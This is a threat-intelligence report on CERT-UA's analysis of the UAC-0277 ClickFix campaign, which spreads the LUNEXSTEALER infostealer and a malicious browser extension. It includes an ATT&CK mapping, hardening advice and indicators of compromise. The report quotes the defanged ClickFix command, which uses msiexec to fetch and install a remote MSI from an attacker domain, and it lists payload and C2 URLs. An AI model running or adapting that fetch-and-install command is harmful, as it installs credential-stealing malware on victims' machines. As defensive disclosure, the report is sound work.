UAC-0277: ClickFix, smart contracts and LUNEXSTEALER

Ukraine’s government incident response team describes a ClickFix campaign served from more than a hundred compromised sites and steered through a smart contract. One of its three installation chains loads a vulnerable AMD driver whose sample does not appear in the April 2026 copy of the Microsoft blocklist examined here.

TLP:CLEAR   PAP:CLEAR   Unlimited disclosure, no restriction on use.
Published
6 October 2026
Subject
UAC-0277, ClickFix, LUNEXSTEALER
Distribution
Public
Confidence
High
Sources
18

The facts

On 30 September 2026, CERT-UA (1), Ukraine’s government computer incident response team, part of the State Service of Special Communications and Information Protection, published its analysis of a campaign tracked under the cluster identifier UAC-0277.

In September 2026, its analysts identified more than a hundred compromised websites whose pages carry malicious JavaScript code. On these compromised sites, visitors are shown a fake Cloudflare verification page which, on the pretext of confirming that they are human, asks them to run a command. That command downloads and installs an MSI (2) package from a remote server. CERT-UA links this method to the ClickFix technique.

Several MSI packages circulated during the campaign; CERT-UA obtained and analysed three variants. All of them end with the execution of LUNEXSTEALER, a 64-bit Windows infostealer that doubles as a remote task execution agent. Depending on the configuration received from its command-and-control server, LUNEXSTEALER installs the malicious LUNARAXE extension, displayed in the browser under the name “Microsoft Office Word Editor”, and the NAIVEMESS component, which gives that extension access to the file system.

The takeaway

The campaign assembles methods already documented separately: configuration stored in a smart contract, a fake Cloudflare verification page, installation of an MSI package from a URL (3), then, depending on the variant, BYOVD (4) or DLL (5) side-loading. The point common to all three variants is the command pasted into the Run dialog: msiexec.exe launched with a URL as its argument.

Point of caution

CERT-UA gives no number of victims or sectors affected, and makes no attribution beyond the UAC-0277 identifier. The smart contract addresses are not among the published indicators.

The infection chain

A configuration read from a smart contract

The script injected into the compromised sites does not hold the domain that serves the fake verification page in clear. That domain and the script’s operating mode are stored in a smart contract on the Polygon or Ethereum blockchain, and read again by the script on every execution, and therefore from the visitor’s browser. The operator can thus change the domain or the mode for all the compromised sites, centrally and without going back to them.

ModeBehaviour described by CERT-UA
0Inactive.
1Passive visitor tracking: the site visited and the referring page are sent to the attackers’ server.
2Display of the fake verification page.

Fig. 1. Operating modes of the injected script, read from the smart contract.

In mode 2, the fake verification page is shown only when three conditions are all met: the visitor runs Windows, arrives through a link from a search engine (Google, DuckDuckGo, meta.ua, bigmir.net, among others), and has not already been shown it twice in the last 12 hours. Direct access to the site, from another operating system or without going through a search engine, therefore does not display the page.

Storing configuration data in a smart contract was described by Guardio Labs in October 2023 under the name EtherHiding, in the ClearFake campaign, which used the BNB Smart Chain. GTIG (6) documented its use by the North Korean actor UNC5342 on 16 October 2025. The use of Polygon to distribute the domains of ClickFix campaigns was reported in 2026, notably by Whalebone in May and by GuidePoint Security in September. CERT-UA establishes no link between UAC-0277 and these activities, and no connection is drawn here.

The fake Cloudflare verification page

The fake verification page asks the visitor to run a command. The three commands published by CERT-UA share the same form:

msiexec.exe /i "hXXps://uasputnik[.]com/elit.msi" /passive ORG_NOTE=”Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот.”

The /i option installs the MSI package directly from the URL, and /passive runs the installation unattended, with only a progress bar. The command ends with a public property, ORG_NOTE, whose value, in Ukrainian, means “Protection against automated requests… ✔️ I confirm that I am not a robot.”. Proofpoint described a comparable method in November 2024: a fake verification message placed at the end of the command, so that the victim does not see the actual command in the Run dialog.

Named by Proofpoint in 2024, the ClickFix technique appears in ATT&CK (7) under the identifier T1204.004 Malicious Copy and Paste. CERT-UA points out that no legitimate “I’m not a robot” check ever asks you either to press Windows+R or open the Command Prompt or PowerShell, or to paste a command in order to run it, and advises closing the page in that case, even on a familiar site.

Three MSI package variants

VariantMechanismFinal payload
1The MSI package installs LUNEXSTEALER directly.LUNEXSTEALER
2The MSI package contains a loader that attempts to bypass Windows User Account Control, adds exclusions to Microsoft Defender, drops the AMD driver PDFWKRNL.sys and exploits CVE-2023-20598 (8) to counter protection tools, then downloads and launches LUNEXSTEALER.LUNEXSTEALER
3The MSI package drops FnHotkeyUtility.exe, presented as legitimate, which loads the malicious library spkvol.dll; that library decrypts and launches LUNEXSTEALER.LUNEXSTEALER

Fig. 2. The three MSI package variants analysed by CERT-UA.

Variant 2: BYOVD and CVE-2023-20598

AMD published CVE-2023-20598 on 16 October 2023 in bulletin AMD-SB-6009. It concerns improper privilege management in the pdfwkrnl.sys kernel driver of AMD Software, Adrenalin and PRO editions: an authenticated attacker can, through a crafted IOCTL (9) request, gain input/output control over arbitrary hardware ports or physical addresses, with possible arbitrary code execution. The NVD (10) gives the flaw a CVSS (11) 3.1 score of 7.8 (vector AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), and CISA (12) maps it to CWE-269 (13). The fixed versions are AMD Software Adrenalin Edition 23.9.2, of 19 September 2023, and PRO Edition 23.Q4, of 12 December 2023.

In a BYOVD scenario, updating the driver installed on the workstation offers no protection: the attacker drops their own signed copy of the vulnerable driver and loads it. The countermeasure targets the loading of the driver, not the installed version.

CVE-2023-20598 is not in CISA’s KEV (14) catalogue (version 2026.10.04 of 4 October 2026, 1,734 entries), and the NVD record carries no date of addition to that catalogue. CISA’s SSVC (15) assessment, dated 27 June 2024, records exploitation at the PoC (16) stage.

The hashes published by CERT-UA for the file embedded_driver.sys, SHA-256 (17) 6e8b49cf70bf854e8c59c7d27cefa89406caf8978461190dabb86dafcd8554e1 and MD5 (18) b96d75a000367c200958089728fc5cb8, are identical to those of the PDFWKRNL.sys sample listed by the LOLDrivers project since 20 March 2026. LOLDrivers describes the file as the Advanced Micro Devices driver “USB-C Power Delivery Firmware Update Utility Driver”, version 1.0, signed by AMD, and added it to its catalogue with reference to ESET’s research on EDR (19) killers published in March 2026.

Point of caution

CERT-UA recommends enabling Microsoft’s vulnerable driver blocklist. In the copy of that blocklist archived by LOLDrivers (SiPolicy_Enforced.xml, version 10.0.27825.0, file updated in the repository on 13 April 2026), five deny rules target PDFWKRNL.sys by hash. None matches the Authenticode hashes of the sample cited by CERT-UA, SHA-1 (20) 661A1A28950CEC3F2C3D0E72AB2A05D4A173CF9A and SHA-256 FC23ABDCF93928E1DB8401A7FF53C86C85230A8637C4168F7434208F9E8B5DED, and no publisher-based rule covers this file. The blocklist deployed on workstations may be more recent than this copy: coverage of this sample needs to be checked against the policy actually applied, and supplemented where needed by an App Control for Business deny rule on these hashes.

Variant 3: DLL side-loading

CERT-UA presents FnHotkeyUtility.exe as a legitimate file, without naming its publisher. It loads spkvol.dll, and that library decrypts then launches LUNEXSTEALER. Four distinct hashes of spkvol.dll appear among the indicators. The published paths place these files in subdirectories of %PROGRAMDATA% named SalmonLightSlateGray, SlateGrayChocolate and GrayLightCyan; the two files sit together in SalmonLightSlateGray and in GrayLightCyan. All three names put together colour names from the CSS (21) standard: Salmon, LightSlateGray, SlateGray, Chocolate, Gray and LightCyan.

LUNEXSTEALER and the LUNARAXE extension

ComponentNatureFunctions described by CERT-UALink to the command-and-control server
LUNEXSTEALER64-bit Windows executableTheft of passwords and tokens stored in browsers, of cryptocurrency wallet data, desktop applications and browser extensions alike, and of system information. Download and execution of executables, MSI packages, PowerShell scripts and cmd.exe commands. Contains the LUNARAXE extension and the NAIVEMESS deployment components, installed according to the configuration received. Depending on the configuration, persistence through the scheduled task psychedelicloveUtils.HTTP (22)
LUNARAXE.COREMain component of the extension, for Chromium-based browsersSends cookies, browsing history, bookmarks, the list of installed extensions and credentials intercepted by LUNARAXE.STEALER. Manages tabs and takes screenshots of them, changes proxy settings, enables or disables extensions, shows notifications, runs JavaScript in pages and overlays a full-screen iframe on their content. With NAIVEMESS, copies files from the workstation, writes files to it and runs them. Resumes automatically after a browser restart.HTTP and WebSocket
LUNARAXE.STEALERScript running in web pagesReads the username and password fields when a form is submitted, or when its submit button is clicked, and passes them with the page address to LUNARAXE.CORE through the extension’s internal messaging.None
LUNARAXE.STRIPAuxiliary component of the extensionRemoves CSP (23) headers from HTTP responses by means of the browser’s network request modification rules, removes the corresponding meta tags from pages and watches for their reinsertion.None
NAIVEMESSPowerShell script registered as the Native Messaging host com.lunex.explorerLists drives, browses directories, reads, creates, overwrites and runs files. Files are transferred in Base64-encoded chunks, directories and groups of files are first compressed to ZIP.None, commands arrive through the extension

Fig. 3. Components of LUNEXSTEALER and LUNARAXE.

CERT-UA assesses that removing the CSP probably allows the other LUNARAXE components to run their own JavaScript and to send data, including on sites with strict security policies.

Native Messaging, the gateway to the file system

Native Messaging is a legitimate mechanism of Chromium-based browsers that lets an extension exchange messages with a program installed on the workstation. On Windows, the host is declared by a registry key placed under HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, \Software\Google\Chrome\NativeMessagingHosts\<name> for Chrome and \Software\Microsoft\Edge\NativeMessagingHosts\<name> for Edge, whose default value points to a JSON (24) manifest. The browser starts the host process itself and talks to it over standard input and standard output. A host declared under HKEY_CURRENT_USER installs without administrator rights.

CERT-UA does not state under which registry root NAIVEMESS is registered. The host name to look for under both roots is com.lunex.explorer.

ATT&CK mapping

CERT-UA does not publish an ATT&CK mapping. The mapping below is drawn up for this article from its description, and each identifier has been checked against the official STIX (25) data of ATT&CK Enterprise, version 19.2.

TacticTechniqueObserved element
Initial AccessT1189 Drive-by CompromiseScript injected into more than a hundred compromised sites
ExecutionT1204.004 Malicious Copy and PasteCommand to be pasted into the Run dialog
StealthT1218.007 Msiexecmsiexec.exe /i on a remote URL
Privilege EscalationT1548.002 Bypass User Account ControlVariant 2
Defense ImpairmentT1685 Disable or Modify ToolsExclusions added to Microsoft Defender, variant 2
Defense ImpairmentT1687 Exploitation for Defense ImpairmentPDFWKRNL.sys, CVE-2023-20598, variant 2
Stealth, ExecutionT1574.001 DLLFnHotkeyUtility.exe loads spkvol.dll, variant 3
PersistenceT1053.005 Scheduled TaskTask psychedelicloveUtils
PersistenceT1176.001 Browser ExtensionsLUNARAXE extension
Credential AccessT1555.003 Credentials from Web BrowsersPasswords stored in browsers
Credential AccessT1539 Steal Web Session CookieCookies sent by LUNARAXE.CORE
CollectionT1185 Browser Session HijackingJavaScript execution in pages, form interception, tab control
DiscoveryT1082 System Information DiscoverySystem information collected by LUNEXSTEALER
ExecutionT1059.001 PowerShellNAIVEMESS, PowerShell scripts launched by LUNEXSTEALER
Command and ControlT1071.001 Web ProtocolsHTTP and WebSocket
Command and ControlT1105 Ingress Tool TransferDownload of LUNEXSTEALER and of additional payloads

Fig. 4. ATT&CK Enterprise v19.2 mapping drawn up for this article.

Changes in nomenclature

Version 19 of ATT&CK renamed tactic TA0005, Defense Evasion, to Stealth, and created the Defense Impairment tactic, TA0112. In that version T1562.001 Disable or Modify Tools is revoked in favour of T1685. Since version 17, T1574.002 DLL Side-Loading has been revoked in favour of T1574.001 DLL. A rule or report that still cites the old identifiers remains readable, but no longer matches the framework in force.

Detection and hardening

CERT-UA’s recommendations and how to implement them

CERT-UA recommendationImplementationLimit
Prevent standard users from using the Run dialog (Windows+R) through Group Policy.User policy “Remove Run menu from Start Menu” (Administrative Templates, Start Menu and Taskbar), which writes NoRun=1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer and also disables the Windows+R shortcut.Microsoft states that the policy does not prevent other ways of running a program. A fake verification page that asks the user to open PowerShell or a terminal is not covered.
Restrict the installation of MSI packages by users without administrator rights, and monitor msiexec.exe launched with a URL.Computer policy “Turn off Windows Installer”, option “For non-managed applications only”, which sets DisableMSI=1 under HKLM\Software\Policies\Microsoft\Windows\Installer: non-elevated per-user installations are blocked.Elevated per-user and per-machine installations remain allowed.
Enable the Microsoft Vulnerable Driver Blocklist.Enabled by default since Windows 11 22H2. On Windows 10, it applies with HVCI (26) or in S mode (article KB5020779).Microsoft does not guarantee that the blocklist covers every vulnerable driver. See the point of caution on PDFWKRNL.sys.
Restrict browser extension installation to an allowlist.Chrome and Edge policies ExtensionInstallBlocklist set to * and ExtensionInstallAllowlist. For Native Messaging: NativeMessagingUserLevelHosts set to 0, or NativeMessagingBlocklist set to * with NativeMessagingAllowlist.NativeMessagingUserLevelHosts set to 0 only keeps hosts installed at system level: a host dropped with administrator rights gets through.

Fig. 5. CERT-UA recommendations and the corresponding Windows and browser settings.

Hunting leads

  • Creation of an msiexec.exe process with /i and a URL as argument (event 4688 with command line logging, or Sysmon event 1). The string ORG_NOTE= appears in all three published commands.
  • Values of the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key containing msiexec or a URL: this key keeps the commands typed into the Run dialog, and public Sigma rules use it for ClickFix.
  • Loading of a driver with SHA-256 hash 6e8b49cf70bf854e8c59c7d27cefa89406caf8978461190dabb86dafcd8554e1 (Sysmon event 6). This hash appears in the Sysmon configurations published by LOLDrivers.
  • Exclusions added to Microsoft Defender: event 5007 in the Microsoft-Windows-Windows Defender/Operational log concerning the Exclusions key.
  • Scheduled task psychedelicloveUtils (event 4698 if the corresponding audit is enabled) and mutex Local\psychedeliclove-guard.
  • Key NativeMessagingHosts\com.lunex.explorer for Chrome or Edge, under both registry roots.
  • Extension named “Microsoft Office Word Editor” in the browser extension inventory.
  • A %PROGRAMDATA% directory containing both FnHotkeyUtility.exe and spkvol.dll.
  • Network traffic to the indicators, including the WebSocket channel 193[.]178.159.128:8080/api/v1/ext/remote.

CERT-UA asks to be notified of any site displaying the fake verification page, and offers owners and administrators of compromised sites help in establishing how the compromise occurred.

Indicators of compromise

Indicators published by CERT-UA, reproduced verbatim, including the source’s defanged notation ([.], hXXp, [:]). The order and grouping of the source are preserved; the Group column numbers the groups of files as they appear in the publication, without linking them to a variant, which CERT-UA does not specify. The extension files appear in two groups, with identical or similar names and different hashes.

Files

GroupFile and hashes
1elita.msi
MD5 1f250eb486571d99bc1e4d760e37a554
SHA-256 38e90affe37342ee36917cdc535fe9bf04589afa8430eb8d1ba1016adcfc1878
1psychedelic.exe
MD5 348cabe85c8bb40e690ab873ab94acac
SHA-256 bf14cd6c3328ebd08e940478b5d1da04e9e5aa576d045d41950bf4f1e2456dd8
2embedded_driver.sys
MD5 b96d75a000367c200958089728fc5cb8
SHA-256 6e8b49cf70bf854e8c59c7d27cefa89406caf8978461190dabb86dafcd8554e1
2elit.msi
MD5 670086be6d64b3fc9d9edcbaf8986c02
SHA-256 3b039a36ed576353cb7eb1054b6ac56f42f63a6fc447edeb58c48b4bb7537482
2Progressive.exe
MD5 dac640a37d5096c47fdd8f745b9a9115
SHA-256 2a373c2ace484d2ada44a26b356de18b5ec8e9d57c5060d42ff239ec1705059c
2spkvol.dll
MD5 d8a99b7a81cfdacc8734e098efe8076e
SHA-256 ad858ea577379fe1ab9e566b2108302185527c66eb9cbd7d0e381297316e8881
2psychedeliclove.exe
MD5 ae5450f32bcb533c5b592c77a7861553
SHA-256 06f434695f93d7fd11eeff71358ff69fed79d310a66d993bbcc4ff979c117c90
3elite.msi
MD5 081eba2bfe3bfb56d6c5ad7d1b28fd6c
SHA-256 cbe90746b6c6f0e4c0e80d4748a149f85341f8405b9e524f8abcf0723a97438b
3elite.exe
MD5 f45a2b3995b2da034b2e03b7ed6cdaaa
SHA-256 f145d4f731d4140de183473b5c6a500a31f44173153fd323cadafa334ee83a3d
4think.msi
MD5 86f5a4f1e83e8b9db390736539863e91
SHA-256 eed67d92d1f059e5b848114c0846207db357d1d60b494b88b8f0e3d9ba5cf24a
4fresh-thinking_12.9.84.30_INSTALL.exe
MD5 cb18caf0dd576a356bb0627989f85b8c
SHA-256 c2198398e84684d7b48d92261996116d2d98c7d4ffbff2b8cc955d1ff06e77eb
4spkvol.dll
MD5 b7081d752375ad8b06639cc9506a4e8e
SHA-256 f16ed095c92c5f65ddb43bf4a6352da1deaead4e98d7187c4fc44d17dfbe88ad
5background.ts-Dgde4GDq.js
MD5 19911b5ad1a5952bf17ecff467b45c62
SHA-256 0eb2c2ac3c593bbeef72dff02a38cdba18589b1dc65f3fd730ed33e9e99cb8b7
5content.ts-B6XGI__y.js
MD5 9a5d0e4382efec512737fdecb8a71dd8
SHA-256 274dc91b92bf17a05ff4f3bfae04924167e4d53f276e7b6c0d6026b3304827b0
5service-worker-loader.js
MD5 eac6683cb79f2e3bd570ee9edd077f3b
SHA-256 6b6a30712d566d30a20c6232d2fe9bc1c49170d78d1ab548513ab46f86bf3c06
5manifest.json
MD5 e5a52ed35bece9bf020b891e47317787
SHA-256 1eb51ef2544ce57dfdfafd3b1400e43abb244887b14c82d0c5a984af70152838
5csp-strip.ts-DrI45pKU.js
MD5 e69a8798fe7d92cee5f7b5321866f01e
SHA-256 725c1cb7ca5f669574988069a3cdb617cba891d4a4a03aa9a1fd3f95c6035997
6esptnk.msi
MD5 0b05147f194274070073c8768684cea5
SHA-256 4efef6a50ae74ea49283a7aec1ee2014ce15a17c05ac0c8df082a6f1449781fa
6solution_6.81.6017.2_INSTALL.exe
MD5 3408ae0d10986ea2c50dca523667ac47
SHA-256 4cd6b9a5841aabb060f10d4d029d1c10a69ad6d2d9291243c504977cf715fefb
6spkvol.dll
MD5 b705a55c963c4c624bfd5d67c6c25fbb
SHA-256 c4e6cfad25e0a93b8542c6280d6c5e0b9de2cfe18c9a67f2d6e4570ae2b92fef
7background.ts-L_QBuUJg.js
MD5 ccaa01de34fad977420179382f37bc3e
SHA-256 289e408e1d2661f55e59611535a156914cd7c60f69f6e3de1163c01c56e487d2
7content.ts-B6XGI__y.js
MD5 f145ec4608878fcbe5b4c94e510b453c
SHA-256 09f83b5f79b934e12f8077b2b462d938ea8124e15ea0debeefe22b706d6c1e92
7service-worker-loader.js
MD5 d8ac71c0593997a5d95276bf705ec7e3
SHA-256 299617dd8b220a49dfaa0cbd0c997e9ba8b01d4cfb0f7aada5db923403dc0587
7manifest.json
MD5 e3ccdf43a405127c7f1eadce436fccd7
SHA-256 3c9bef5c766c8c0bcc403248a489e656f4e31bea0083575dc815afe68f6abe26
7csp-strip.ts-DrI45pKU.js
MD5 502eb1fb70c0153f0d56f12d49a20094
SHA-256 957776ef93ff598bfbe9dfba8c80425c1718927605c42e26131b0362dd790343
8omen.msi
MD5 2b19559333c0a5047892cf7239b9057d
SHA-256 fd80d52c7aa4f82744fb6a82c878851a6dd50e001bfbb2b7dd9df884dbcdfb40
8omen.exe
MD5 9fb1c651405f35c859fc89ff4c142a49
SHA-256 b862fa82eacf4b989c6a82155c1f4ab0b435f57b4d20a0bf2871fc675fca6059
8spkvol.dll
MD5 51ccf7074c6d4753e4a1d335184c39d4
SHA-256 c67c0800d9cff00b0b377e205e03ff4dcb5a6587cceacb4e7b08e29c51aeee9f

Fig. 6. Files, 28 hashes in eight groups.

Network

IP address
107[.]175.82.242
193[.]178.158.61
193[.]178.159.128
109[.]238.86.112
109[.]238.86.113
176[.]53.159.40
159[.]69.234.218

Fig. 7. IP (27) addresses, 7 entries.

Domain
ahahahahadebili[.]help
fsputnik[.]com
sputnk[.]com
uasputnik[.]com
uasputn[.]com
partaonline[.]click
vibestglobal[.]com
flareru[.]live
plerdgate[.]com
ukrainerada[.]top
radaukraine[.]top
astratechuthree[.]top
spectre.pp[.]ua
chillplace.pp[.]ua
alohapages.pp[.]ua
vatra.pp[.]ua
fainomedia.pp[.]ua
trembita.pp[.]ua
archivision.pp[.]ua

Fig. 8. Domains, 19 entries.

URL
(ws)://193[.]178.159.128:8080/api/v1/ext/remote
hXXp://107[.]175.82.242:9000/wilow/psychedeliclove[.]exe
hXXp://193[.]178.159.128:8080
hXXps://uasputnik[.]com/elit.msi
hXXps://uasputnik[.]com/elita.msi
hXXps://uasputnik[.]com/elite.msi
hXXp://109[.]238.86.112:8080
hXXp://109[.]238.86.113:8080
hXXps://ahahahahadebili[.]help/tds/tds.php
hXXps://ahahahahadebili[.]help/think.msi
hXXps://sputnk[.]com/think.msi
hXXps://uasputn[.]com/esptnk.msi
hXXps://uasputnik[.]com/omen.msi
hXXps://ukrainerada[.]top/tds/tds.php
hXXps://chillplace.pp[.]ua/tds/tds.php
hXXps://alohapages.pp[.]ua/tds/tds.php
hXXps://spectre.pp[.]ua/tds/tds.php
hXXps://spectre.pp[.]ua/spectre.msi
https[:]//ilovecutecatetetes[.]click
https[:]//ilovecutecatics[.]com
http[:]//ilovecutecatics[.]com[:]8080
https[:]//ilovecutecatics[.]com[:]2053
https[:]//ilovecutecaticval[.]com[:]2053

Fig. 9. URLs, 23 entries.

Host

Host indicator
%PROGRAMDATA%/SalmonLightSlateGray/FnHotkeyUtility.exe
%PROGRAMDATA%/SalmonLightSlateGray/spkvol.dll
%PROGRAMDATA%\SlateGrayChocolate\spkvol.dll
%PROGRAMDATA%\GrayLightCyan\FnHotkeyUtility.exe
%PROGRAMDATA%\GrayLightCyan\spkvol.dll
%TEMP%\psychedeliclove.exe
Local\psychedeliclove-guard
msiexec.exe /i "hXXps://uasputnik[.]com/elit.msi" /passive ORG_NOTE=”Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот.”
msiexec.exe /i "hXXps://uasputnik[.]com/elita.msi" /passive ORG_NOTE=”Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот.”
msiexec.exe /i "hXXps://uasputnik[.]com/elite.msi" /passive ORG_NOTE=”Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот.”
psychedelicloveUtils (Scheduled Task)

Fig. 10. Host indicators, 11 entries.

Source qualification

A single primary source describes the campaign. The elements that can be verified elsewhere have been cross-checked against independent sources.

ItemStatusComment
Description of the campaign, variants, components and indicatorssingle sourceCERT-UA publication of 30 September 2026. No third-party publication on UAC-0277, LUNEXSTEALER, LUNARAXE or NAIVEMESS was found as of 6 October 2026.
Identity of the file embedded_driver.syscorroboratedMD5 and SHA-256 hashes identical to the LOLDrivers PDFWKRNL.sys sample.
CVE-2023-20598, score, weakness and fixed versionscorroboratedBulletin AMD-SB-6009 and the NVD record agree, including on versions 23.9.2 and 23.Q4.
CVE-2023-20598 absent from the KEV cataloguecorroboratedCatalogue file published by CISA, version 2026.10.04, and an NVD record with no date of addition to the catalogue.
Sample not covered by the Microsoft blocklistsingle sourceCopy of the blocklist archived by LOLDrivers, updated on 13 April 2026. The version currently distributed by Microsoft was not consulted.
Use of Polygon in other ClickFix campaigns in 2026corroboratedWhalebone, May 2026, and GuidePoint Security as reported by Dark Reading, September 2026.
ATT&CK mappingsingle sourceDrawn up for this article; identifiers and names checked against the ATT&CK Enterprise v19.2 STIX data.
Link between UAC-0277 and ClearFake, UNC5342 or other operators using EtherHidingdiscardedNo link established by CERT-UA or by the sources consulted.

Assessment

Exposure of Windows workstations
More than a hundred compromised sites, configuration changeable without going back to the sites; execution relies on a user action and not on a browser flaw.
High
Impact on defences
Microsoft Defender exclusions and BYOVD with a sample absent from the April 2026 copy of the Microsoft blocklist.
High
Impact on accounts
Stored passwords, cookies, form entries and remote control of the browser.
High
Reproducibility of the analysis
Filtering by operating system and by referrer, at most two displays per 12-hour period, smart contract addresses not published.
Low
Method note

This analysis is built on the Ukrainian version of the CERT-UA publication, without access to the samples. The driver hashes were compared with LOLDrivers data and with its copy of the Microsoft blocklist, the status of CVE-2023-20598 with the NVD record, the AMD bulletin and the KEV catalogue file, and the ATT&CK identifiers with the v19.2 STIX data. The reproduced indicators were compared with the source page by script. The ratings in the grid are judgement.

Glossary

  1. CERT-UA (1): Computer Emergency Response Team of Ukraine, Ukraine’s government computer incident response team, part of the State Service of Special Communications and Information Protection.
  2. MSI (2): Microsoft Installer, the installation package format handled by Windows Installer and launched from the command line with msiexec.exe.
  3. URL (3): Uniform Resource Locator, the address of a resource on the web.
  4. BYOVD (4): Bring Your Own Vulnerable Driver, the attacker dropping and loading a legitimate, signed and vulnerable driver to gain kernel mode rights.
  5. DLL (5): Dynamic-Link Library, a code library loaded dynamically by a Windows program.
  6. GTIG (6): Google Threat Intelligence Group, Google’s team dedicated to threat analysis.
  7. ATT&CK (7): Adversarial Tactics, Techniques, and Common Knowledge, the framework of attack tactics and techniques maintained by MITRE.
  8. CVE (8): Common Vulnerabilities and Exposures, the public identifier assigned to a vulnerability.
  9. IOCTL (9): Input/Output Control, a control request sent by a program to a driver.
  10. NVD (10): National Vulnerability Database, the vulnerability database of the United States NIST.
  11. CVSS (11): Common Vulnerability Scoring System, the system for rating the severity of vulnerabilities.
  12. CISA (12): Cybersecurity and Infrastructure Security Agency, the United States cybersecurity and infrastructure security agency.
  13. CWE (13): Common Weakness Enumeration, the classification of software weaknesses.
  14. KEV (14): Known Exploited Vulnerabilities, CISA’s catalogue of vulnerabilities whose exploitation has been observed.
  15. SSVC (15): Stakeholder-Specific Vulnerability Categorization, the vulnerability prioritisation method used by CISA.
  16. PoC (16): Proof of Concept, a technical demonstration that a flaw can be exploited.
  17. SHA-256 (17): Secure Hash Algorithm 256 bits, the hash function used for file hashes.
  18. MD5 (18): Message Digest 5, a hash function, used here as a complementary hash.
  19. EDR (19): Endpoint Detection and Response, a detection and response tool for workstations and servers.
  20. SHA-1 (20): Secure Hash Algorithm 1, a 160-bit hash function.
  21. CSS (21): Cascading Style Sheets, the styling language for web pages, which defines a list of colour names.
  22. HTTP (22): Hypertext Transfer Protocol, the transfer protocol of the web.
  23. CSP (23): Content Security Policy, the security policy that restricts a page’s script sources and the destinations of the data it sends.
  24. JSON (24): JavaScript Object Notation, a text format for structured data.
  25. STIX (25): Structured Threat Information Expression, a format for exchanging threat data, used to publish ATT&CK.
  26. HVCI (26): Hypervisor-protected Code Integrity, kernel mode code integrity enforcement protected by the Windows hypervisor.
  27. IP (27): Internet Protocol, the addressing protocol of the Internet.

Sources

  1. CERT-UA, “UAC-0277: ClickFix на скомпрометованих вебсайтах для поширення LUNEXSTEALER”, 30 September 2026. cert.gov.ua
  2. AMD, bulletin AMD-SB-6009, AMD Radeon Graphics Kernel Driver Privilege Management Vulnerability, 16 October 2023. amd.com
  3. NIST NVD, record CVE-2023-20598, published 17 October 2023, accessed 6 October 2026. nvd.nist.gov
  4. CISA, Known Exploited Vulnerabilities catalogue, version 2026.10.04, 4 October 2026. github.com/cisagov/kev-data
  5. LOLDrivers, PDFWKRNL.sys entry, added 20 March 2026. loldrivers.io
  6. LOLDrivers, copy of the Microsoft blocklist SiPolicy_Enforced.xml, version 10.0.27825.0, updated 13 April 2026. github.com/magicsword-io/LOLDrivers
  7. Microsoft, KB5020779, The vulnerable driver blocklist after the October 2022 preview release, October 2022. support.microsoft.com
  8. MITRE, ATT&CK Enterprise v19.2, STIX data, 5 August 2026. github.com/mitre-attack/attack-stix-data
  9. MITRE, ATT&CK, T1204.004 Malicious Copy and Paste, accessed 6 October 2026. attack.mitre.org
  10. Proofpoint, Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape, November 2024. proofpoint.com
  11. Guardio Labs, EtherHiding: Hiding Web2 Malicious Code in Web3 Smart Contracts, October 2023. guard.io
  12. Google Threat Intelligence Group, DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains, 16 October 2025. cloud.google.com
  13. Whalebone, The Secrets of Blockchain: ClickFix Utilizes Polygon for C2 Domain Distribution, 27 May 2026. whalebone.io
  14. Dark Reading, ClickFix Campaign Compromises 31 Orgs, Abuses Polygon Blockchain, GuidePoint Security research, 1 September 2026. darkreading.com
  15. Google, Chrome for Developers, Native messaging, accessed 6 October 2026. developer.chrome.com
  16. Microsoft Learn, Edge policy NativeMessagingUserLevelHosts, accessed 6 October 2026. learn.microsoft.com
  17. Microsoft Learn, DisableMSI, Windows Installer policy, accessed 6 October 2026. learn.microsoft.com
  18. Microsoft, NoRun, registry entry for the Remove Run menu from Start Menu policy, accessed 6 October 2026. technet.microsoft.com

Marked TLP:CLEAR, PAP:CLEAR. Unlimited disclosure, no restriction on use.

The analysis presented here reflects the author’s own views and rests on the public sources listed above.